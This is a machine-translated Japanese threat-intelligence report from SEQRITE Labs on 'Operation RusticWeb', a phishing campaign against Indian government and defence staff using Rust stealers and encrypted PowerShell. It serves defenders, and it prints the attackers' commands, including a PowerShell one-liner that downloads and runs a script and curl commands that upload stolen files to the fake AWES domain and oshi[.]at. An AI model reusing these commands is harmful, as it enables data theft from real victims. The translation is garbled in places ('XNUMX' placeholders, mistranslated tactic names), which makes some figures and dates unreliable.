SEQRITE Labs APTチームは、2023年2月以降、インド政府関係者を標的としたフィッシング攻撃キャンペーンを発見しました。また、XNUMX月には防衛分野の政府機関と民間企業の両方が標的となっていることも確認しました。新たなRustベースのペイロードと暗号化されたPowerShellコマンドは、専用のコマンドアンドコントロール(CXNUMX)サーバーではなく、Webベースのサービスエンジンに機密文書を盗み出すために利用されています。攻撃ツールは積極的に変更されており、偽のドメインを使用して悪意のあるペイロードやおとりファイルをホストしています。以下は、このキャンペーンで使用されたドメイン名とサンプルのベイトです。
- 人事訓練省の IPR フォーム(IAS 職員専用)
- 陸軍福祉教育協会 (AWES) を模倣した偽のドメイン
- カイラシュ・サティヤルティ子ども財団によるアッサム州CDRの統計レポート
- 政府のSSOプラットフォームであるParichayを模倣した別の偽ドメイン
- 国防軍職員年金基金(DSOP)の推薦フォーム
- 国防省との四半期ごとの取り組み概要のプレゼンテーション
このキャンペーンは次のように追跡されます オペレーション・ラスティックウェブ複数のTTPがパキスタン関連のAPTグループと重複している – トランスペアレント トライブ (APT36)と サイドコピーオペレーションとの類似点もあります アーマーピアサー シスコが2021年に発表した報告書とESSAによる標的 奨学金用紙 AWES は、同じ年に私たちのチームによって観測されました。
脅威アクターは、よく知られたコンパイル言語からGolang、Rust、Nimといった新しい言語へと移行し始めています。これにより相互互換性が確保されると同時に、検出も困難になります。私たちのチームが分析したGolangマルウェアの最近の例としては、Windowsベースのものが挙げられます。 ワープ マルウェア エコシステム TelegramボットをC2として使い、Linuxベースのステージャーペイロード アレスラット同時に、さまざまなランサムウェア(RaaS)オペレーターが、メモリの安全性を確保しながら高性能な暗号化と回避速度を提供するため、GolangからRustに移行しています。
感染チェーン1
最初に確認された感染は、ファイルシステムの列挙に使用されるRustベースのペイロードに大きく依存していました。悪意のあるショートカットファイルが感染を開始し、AWESの偽ドメインを利用してこれらのペイロードをドロップし、ファイル共有ウェブサービスにデータを流出させます。
図1 – 感染連鎖(1)
攻撃者はスピアフィッシングで被害者をターゲットにし、「IPR_2023-24」。このファイルには、二重拡張子形式を用いてPDFファイルを装ったWindowsショートカットファイルが含まれています。コメント名から、このおとりはIPR関連のフォームであることが示唆されます。
図2 – 悪意のあるショートカットファイル
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep バイパス -nop -c “iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\Documents\file.ps1; & $env:USERPROFILE\Documents\file.ps1” |
これを開くとPowerShellが起動し、 rb[.]gy 無料のURL短縮サービス「domain」。プロファイルなしの実行ポリシーをバイパスするためのコマンドラインパラメータは、Invoke-WebRequestを使用してPS1スクリプトをダウンロードする際に使用されます。
犠牲者
短縮URLに基づいて、クリック数とクリック元の国に関する統計情報をトラッカーで確認できます。キャンペーンは26.53月末に開始され、XNUMX月には多くのアクティビティが見られ、そのうちXNUMX%はインドからのものでした。これは確認された被害者の属性を反映したものではありませんが、標的となった被害者の概要を示しています。
図3 – 被害者学
PowerShell ステージ
展開されたURLは、 awesscholarship[.]in PowerShellスクリプトを取得して保存する (ファイル.ps1) に選出しました。 ドキュメント フォルダ。このスクリプトを確認する前は、ドメイン名は「陸軍福祉教育協会」の奨学金のように見えますが、この組織の正当なドメインは 奨学金[.]awesindia[.]com, 過去にも同様のフィッシングキャンペーンが確認されています。この偽ドメインのページを開くと、AWESの公式ページにリダイレクトされ、以下に示すように公式の警告通知が表示されます。
図4 – 偽ウェブサイトに関する公式通知
PowerShellスクリプトは、ルアー文書と共に後続ステージのペイロードをダウンロードするためのURLパスの設定から始まります。ファイルのダウンロードとアップロードのターゲットパスが設定され、主にこれらの機能のために3つの関数が定義されています。
図5 – PowerShellスクリプト
X関数とY関数は、それぞれファイルにメッセージを記録したり、指定されたURLからターゲットパスにファイルをダウンロードしてログに記録したりするために使用されます。ターゲットの場所はデフォルトで ドキュメント という新しいフォルダが作成されたディレクトリ ダウンロード おとりの PDF ファイルとアーカイブをフォルダーの横にドロップするように作成されます。
図6 – PowerShellスクリプト(続き)
デコイが開かれると、拡張子のない単一のファイルを含むアーカイブファイルが抽出されます。このファイルはEXE拡張子を追加して名前が変更され、実行されます。最後に、Z関数を使用してログファイルをサーバーにアップロードします。 curl コマンドを実行し、記録されたログを削除します。
図7 – アップロードされたログファイル
一方、開かれたおとりファイルは、不動産申告書の様式であり、そのサービスには「インド行政サービスインド政府の様々なポータルサイトには、同様のフォームが複数公開されています。ただし、この空白のIPRフォームは、インド人事訓練省(DoPT)のウェブサイトから入手できます。 ウェブサイト インド人事省の苦情・年金局が管轄するものです。これは陸軍個人申請書に記載されているESSA(教育奨学金制度)とは一切関係ありませんのでご注意ください。
図8 – デコイ:IAS職員向けIPRフォーム(23年XNUMX月)
ダウンローダー: システムチェック段階
EXEペイロードは、PDBパスにある基本的なシステム情報をチェックするRustでコンパイルされたバイナリであることが判明しました - 'syscheck.pdbIDA Proプラグインを使用してRust関数名をデマングリングすると、多くの書き込み関数とコマンド実行関数が呼び出されていることがわかります。この関数は、以下の方法で情報を取得します。
- ドメイン ifconfig[.]me IPアドレスを取得する
- 被害者のシステムに存在するアクティブなドライブを取得するためのWMICコマンド – 「wmic 論理ディスク キャプションの取得"。
図9 – システムチェックログ
これらのログは「マイシステム.txt' プログラムデータ\syscheck ディレクトリに保存され、次のドメインにアップロードされます:
「curl -F TT=@C:\ProgramData\syscheck\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php」
図10 – 次のステージをダウンロードするためのURL
次に別のアーカイブ ファイル1.zip 同じ偽ドメインからダウンロードされ、解凍されます。ファイル名は「マイシステム.exe' を実行し、最後に 持続性 この最終的なペイロードはスタートアップ ディレクトリを通じて作成されます。
図11 – スタートアップによる永続化
スティーラー:最終ステージ
最後のペイロードは、Rustベースのマルウェアで、ファイルを窃取し、システム名とIPアドレスを収集し、ログと共に個々のファイルをアップロードします。Webブラウザ、Discord/Steam、暗号通貨ウォレットからの窃取といった高度な情報窃取マルウェアに見られる機能は備えていません。今回のキャンペーンでは、このスティーラーの複数のバージョンが発見され、コンパイルタイムスタンプは9月から現在(12月)まで様々です。これらのバージョンはVirus Totalでの検出率が著しく低くなっています。
| MD5 | コンパイルタイムスタンプ | PDB |
| da745b60b5ef5b4881c6bc4b7a48d784 | 2023-09-26 | syscheck.pdb |
| f68b17f1261aaa4460d759d95124fbd4 | 2023-09-26 | alam.pdb |
| 237961bbba6d4aa2e0fae720d4ece439 | 2023-10-26 | alam.pdb |
| d2949a3c4496cb2b4d204b75e24390d9 | 2023-12-08 | Zew.pdb |
| fc61b985d8c590860f397d943131bfb5 | 2023-12-11 | Zew.pdb |
91 月と XNUMX 月のサンプルでは PDB パス名の変更が見られますが、BinDiff で比較すると、いくつかの小さな変更を除いて類似性はほぼ同じで、XNUMX% です。
図12 – サンプルの類似性
ダウンローダー段階で取得したすべてのドライブ内のすべてのドキュメントとアーカイブファイルを列挙します。新しいフォルダ内に、異なる名前の2つのログファイルが作成されます(マイクロ、ファイル)の各サンプルについて ProgramData ディレクトリ。アップロードされたファイルの記録と列挙されたファイルのログを保存するために使用されます。列挙されたファイルを「Logs.txt、' 各ファイルは、 curl PUTメソッド oshi[.]at ドメイン、匿名のパブリックファイル共有エンジンと呼ばれる 押上アップロード.
「curl -TC:\Users\test\Downloads\ .zip hxxps://oshi[.]at”
デスクトップ名とともに、これらのファイルをダウンロードするためのリンクは「記録.txt、' には、各ファイルごとに3つのURLが含まれています。2つはクリアネットリンクで、1つは管理用、もう1つはダウンロード用です。3つ目は、隠しサービス経由でダウンロードするための Oshi の Tor ドメインです。
図13 – アップロードされたファイルのダウンロードリンク
管理ページには、アップロードされたファイルの属性(ダウンロードリンク、サイズ、タイプ、ハッシュ、タイムスタンプ)が表示されます。ファイルの破棄オプションと有効期限タイマーも用意されています。
図14 – アップロードされたファイルの管理ページ
ファイル名にタイムスタンプが含まれたログファイルが偽のAWESドメインにアップロードされます。サーバーの応答がアップロード成功の検証後、サーバーは中断されるまで無期限にスリープ状態になります。
図15 – ログアップロード後のサーバー応答
12月に確認された新たなスティーラーペイロードでは、脅威アクターはKailash Satyarthi Children's Foundationが所有する新たなおとり文書を利用しています。この文書は、 ウェブサイトこれは「アッサムにおける児童婚および児童に対するその他の犯罪」に関する統計報告書に関連しています。
図16 – デコイ:アッサムCDR(23年XNUMX月)
スピアフィッシング攻撃で、陸軍の子供や IAS 職員のための子供財団や児童協会をテーマとしたおとりメールを使用していることは、インド政府関係者、特に子供財団や児童協会に関係する関係者を狙った標的型の攻撃であることを示しています。
感染チェーン2
12月には、マルドキュメントを用いた同様の感染チェーンが観測されました。このチェーンでは、Rustベースのペイロードではなく、PowerShellスクリプトを用いて列挙と情報抽出が行われていました。このチェーンでは、2つの偽ドメインに加え、暗号化されたPowerShellスクリプトが使用されていました。
図17 – 感染連鎖(2)
感染は、悪意のあるVBAマクロを含むフィッシング不正ドキュメントから始まります。基本的なVBA難読化により、暗号化されたPowerShellコマンドが含まれています。わずかに改変されたPSコマンドを使用する同様の不正ドキュメントも確認されています。
- Dsop_Nom.ppam
- DSOP-NOM.ppam
- PM_INDIG_INITIATIVE_BRIEF.ppam
図18 – 悪意のあるVBAマクロ
暗号化された PowerShell
文書を開くと、数字が「パワーシェル'. PowerShellコマンドには暗号化されたデータが含まれており、'を使用してSecureStringに変換されます。ConvertTo-SecureString' をキーで復号します。これは、PowerShell の復号方法と似ています。 エモット ただし、若干の難読化が加わります。
図19 – 暗号化および難読化されたPowerShellコマンド
最初のmaldocでは、変換された文字列は マーシャル 内蔵のDPAPIを介して復号化を管理するメモリオブジェクトを使用してコマンドを呼び出す セキュア文字列からグローバルアロケーションユニコードへ 2番目の方法は、 PSCredentials オブジェクトを使ってプレーンテキスト文字列を取得します。最後の例では、 PtrToStringBSTR の三脚と セキュア文字列をBSTRに変換する は、 マーシャル オブジェクト。難読化のために、コマンドは 難読化の呼び出し 環境変数を使用して IEX コマンドのトリガーをマスクするには:
図20 – 難読化されたIEXコマンド
完全に復号されたPowerShellコマンドを見ると、おとりファイルと次の段階のPowerShellスクリプトがダウンロードされていることがわかります。これらはドメインから ダウンロード の三脚と ドキュメント ディレクトリを作成して実行します。
図21 – デコードされたコマンド(1)
図22 – デコードされたコマンド(2)
ドメインとデコイ
最初のシナリオはドメイン「parichay.epar[.]in,一方、2つ目の偽ドメインは、最初の感染チェーンで確認されたものと同じAWESの偽ドメインを使用しています。これは、政府の公式ウェブサイトを模倣した、悪意のあるペイロードをホストするために使用される別の偽ドメインです。parichay.nic[.]inこれは、単一の認証フレームワークの下でユーザーをオンボーディングするために設計された政府SSOプラットフォームです。パリチャイ氏は、政府職員が「ユーザー部門」と政府のメールアドレス(@nic.in/@gov.in)に基づいて様々なNICサービスにアクセスすることを承認する一方、ジャン・パリチャイ氏は、市民が市民中心のサービスにアクセスすることを承認します。
図23 – 正規のParichayドメインと偽のParichayドメイン
最初のデコイは、国防会計局が担当するDSOP(国防軍職員積立基金)の申請フォームに関するものです。2つ目のデコイは、国防省との四半期報告書に関するプレゼンテーションに関するものです。
図24 – デコイ:国防軍職員積立基金(DSOP)
図25 – デコイ:国防省
次の段階のPowerShellスクリプト「メールチェック.ps1ドロップされたスクリプトも同様に暗号化され、難読化されています。復号されたスクリプトを見ると、まずアーカイブファイルをダウンロードして解凍し、その中に「syscheck.exe。このペイロードの永続性を確立するために、スタートアップ フォルダーに直接抽出されます。
図26 – 復号後にドロップされたPowerShellスクリプト
列挙と抽出
バイナリは別のPDB名を持つ別のRustベースのペイロードです。 「Aplet.pdb」です。 コンパイラのタイムスタンプは14月XNUMX日で、シスコの名前が付けられています。 AnyConnect Webヘルパー 署名された証明書付き。
図27 – WebHelper証明書付きバイナリ
列挙と抽出を直接実行する代わりに、PowerShellスクリプトをドロップします。sys.ps1'に ピクチャー ユーザー名を取得した後、この目的のためにディレクトリを作成します。実行されるコマンドは次のとおりです。
「powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\test\Pictures\sys.ps1」
列挙中に 3 つのフォルダーを除外します。 Windows そして、プログラムファイル' ディレクトリ。13 種類のファイル形式のみがリストに含まれています: ('.ppt'、'.pptx'、'.pdf'、'.xlsx'、'.xlsm'、'.xls'、'.xlam'、'.doc'、'.docx'、'.docm'、'.txt'、'.dot'、'.ppam') 各ファイルは 'パス.txt' ドキュメント フォルダにコピーします。
図28 – 列挙と抽出
アップロードされると oshi[.]atダウンロードURLは「suc_logs.txtキャンペーン1と同様です。このスクリプトは無限ループで実行され、新しいファイルが作成されたかどうかを確認します。これらのURLログは、一定期間後に定期的にアップロードされます。
図29 – ログのアップロード
一方、親バイナリ(システムチェック)は、中断されない限り無限スリープ状態になります。中断された場合は、終了する代わりに、URLログをOshiに再度アップロードします。さらに、今回はバックアップ対策として、firebaseioのサブドメインにもアップロードします。
図30 – 認証付きでFirebaseioにアップロード
Firebase Realtime Databaseは、クラウドホスト型のNoSQLデータベースで、リアルタイムでデータを保存・同期できます。Googleが開発したオープンプラットフォームで、クラウドベースのアプリケーション開発者に広く利用されており、脅威アクターがマルウェアなどのマルウェアを展開するきっかけとなっています。 不運なカムラン データを盗み出すために。クラウドストレージ、ホスティング、リアルタイムデータベースなど、さまざまな機能を提供します。
結論
新たなフィッシング攻撃が、インド政府関係者を標的に機密文書を盗み出そうとしています。Rustベースのペイロードと暗号化されたPowerShellスクリプトが展開され、文書を列挙し、匿名の公開ファイル共有エンジン「」に流出させています。 押上アップロード 専用のコマンドアンドコントロール(C2)サーバーの代わりに、政府機関を模倣した偽のドメインがXNUMXつとも、このサイバースパイ攻撃における悪意のあるペイロードのホスティングに使用されました。Operation RusticWebは、パキスタンに関連する様々なグループとの類似点があるため、APT脅威との関連性が疑われます。脅威アクターがGolang、Rust、Nimといった新しいコンパイル言語を用いて開発されたマルウェアに移行しているため、慎重に行動し、必要な予防措置を講じて保護を維持することをお勧めします。
SEQRITE保護
- リンクスティーラー48397
- PS.スティーラー.48398
- RustStealer.48408.GC
- スクリプト.RustStealer.48409
- Trojan.Ruststealer
MITER ATT&CK
| 戦略 | テクニックID | 名前 |
| リソース開発 | T1583.001
T1587.001 T1588.002 T1608.001 T1608.005 |
インフラストラクチャの取得:ドメイン
機能の開発:マルウェア 機能の取得:ツール ステージ機能:マルウェアのアップロード ステージ機能: リンクターゲット |
| 初期アクセス | T1566.002 | フィッシング:スピアフィッシング リンク |
| 実行 | T1106
T1129 T1059 T1047 T1204.002 |
ネイティブAPI
共有モジュール コマンドおよびスクリプト インタプリタ Windowsの管理の実装 ユーザーの実行:悪意のあるファイル |
| 固執 | T1547.001 | レジストリ実行キー / スタートアップ フォルダー |
| 防衛回避 | T1027.010
T1036.007 T1140 |
コマンド難読化
マスカレード: 二重のファイル拡張子 ファイルまたは情報の難読化/デコード |
| プーケットの魅力 | T1016
T1033 T1083 |
システムネットワーク構成の検出
システム所有者/ユーザーの発見 ファイルとディレクトリの検出 |
| 収集 | T1005
T1119 |
ローカルシステムからのデータ
自動収集 |
| コマンドおよび制御 | T1105 | 入力ツール転送 |
| exfiltration | T1020
T1567 |
自動流出
Web サービスを介した漏洩 |
IOC
| MD5 | ファイル名 |
| 56cb95b63162d0dfceb30100ded1131a | IPR_2023-24.pdf.zip |
| 13ee4bd10f05ee0499e18de68b3ea4d5 | IPR_2023-24.pdf.lnk |
| de30abf093bd4dfe6b660079751951c6 | DSOP-NOM.ppam |
| PowerShellの | |
| c9969ece7bb47efac4b3b04cdc1538e5 | in.ps1 |
| f14e778f4d22df275c817ac3014873dc | In.ps1 |
| 501a6d48fd8f80a134cf71db3804cf95 | メールチェック.ps1 |
| 6d29fc0a73096433ff9449c4bbc4cccc | sys.ps1 |
| おとり | |
| a9182c812c7f7d3e505677a57c8a353b | Ipr.pdf |
| f5d8664cbf4a9e154d4a888e4384cb1d | abc009.pdf |
| 3ce8dfb3f1bff805cb6b85a9e950b3a2 | 1.pdf |
| a696c50dd5d15ba75c9e7f8d3c64997c | 1.pdf |
| アーカイブ | |
| e0102071722a87f119b12434ae651b48 | |
| ee8d767069faf558886f1163a92e4009 | |
| 9f3359ae571c247a8be28c0684678304 | |
| b0b6629d35451bcc511c0f2845934c3e | |
| f2501e8b57486c427579eeda20b729fd | |
| 20b4eb5787faa00474f7d27c0fea1e4b | |
| 635864ff270cf8e366a7747fb5996766 | |
| エグゼ | |
| da745b60b5ef5b4881c6bc4b7a48d784 | |
| f68b17f1261aaa4460d759d95124fbd4 | |
| 237961bbba6d4aa2e0fae720d4ece439 | |
| d2949a3c4496cb2b4d204b75e24390d9 | |
| fc61b985d8c590860f397d943131bfb5 | |
| 04557782d7017f18ec059fc96d7f2dc8 | |
| ドメイン/IP | |
| awesscholarship[.]in 89.117.188[。]126 |
|
| parichay.epar[.]in 13.232.102[。]189 |
|
| oshi[.]at | |
| alfa-aeafa-default-rtdb.firebaseio[.]com | |
| URLは | |
| hxxps://rb[.]gy/gbfsi | |
| hxxps://awesscholarship[.]in/upload/file.zip | |
| hxxps://awesscholarship[.]in/upload/file1.zip | |
| hxxps://awesscholarship[.]in/upload/in.ps1 | |
| hxxps://awesscholarship[.]in/upload/upload.php | |
| hxxps://awesscholarship[.]in/upload/Ipr.pdf | |
| hxxps://awesscholarship[.]in/upload/abc009.pdf | |
| hxxps://awesscholarship[.]in/upload/1.pdf | |
| hxxps://awesscholarship[.]in/upload/DSOP-NOM.zip | |
| hxxps://awesscholarship[.]in/ppam/Mail_Check.ps1 | |
| hxxps://awesscholarship[.]in/ppam/syscheck.zip | |
| hxxps://parichay.epar[.]in/Win/1.pdf | |
| hxxps://parichay.epar[.]in/Win/Mail_Check.ps1 | |
| PDB | |
| C:\Users\123\Desktop\Syscheck\target\release\deps\syscheck.pdb | |
| C:\Users\123\Desktop\Alam\target\release\deps\alam.pdb | |
| C:\Users\123\Desktop\Aplet\target\release\deps\Aplet.pdb | |
| D:\HOME\DESKTOP NEW DATA\Zew\target\release\deps\Zew.pdb | |
| 主催者 | |
| C:\ProgramData\syscheck\file.zip | |
| C:\ProgramData\syscheck\MySystem.exe | |
| C:\ProgramData\syscheck\MySystem.txt | |
| C:\ProgramData\Micro\logs.txt | |
| C:\ProgramData\Micro\records.txt | |
| C:\ProgramData\Files\Log.txt | |
| C:\ProgramData\Files\Records.txt | |
| ドキュメント\ダウンロードおよび実行ログ.txt | |
| ドキュメント\ファイル.ps1 | |
| ドキュメント\myfile.zip | |
| ドキュメント\解凍されたフォルダー\ファイル.exe | |
| ドキュメント\ダウンロード\myfile.pdf | |
| ドキュメント\paths.txt | |
| ドキュメント\suc_logs.txt | |
| ドキュメント\メール_チェック.ps1 | |
| ドキュメント\syscheck.zip | |
| ダウンロード\1.pdf | |
| ピクチャ\sys.ps1 | |
| %appdata%\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ\MySystem.exe | |
| %appdata%\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ\syscheck.exe | |
著者: サトウィック・ラム・プラッキ
